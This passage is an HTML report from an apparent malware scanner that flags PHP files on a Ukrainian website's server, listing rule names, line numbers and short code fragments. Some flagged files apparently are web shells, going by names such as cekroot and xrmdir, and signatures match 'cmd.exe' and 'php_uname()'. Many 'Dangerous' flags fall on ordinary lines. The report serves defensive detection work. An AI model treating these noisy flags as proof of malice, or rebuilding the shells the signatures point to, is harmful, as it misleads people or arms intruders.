</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_3").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ripeh.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-09 14:09:21</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_4" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 785</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_4").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/hpdei.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-02-04 16:45:58</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_5" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 785</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
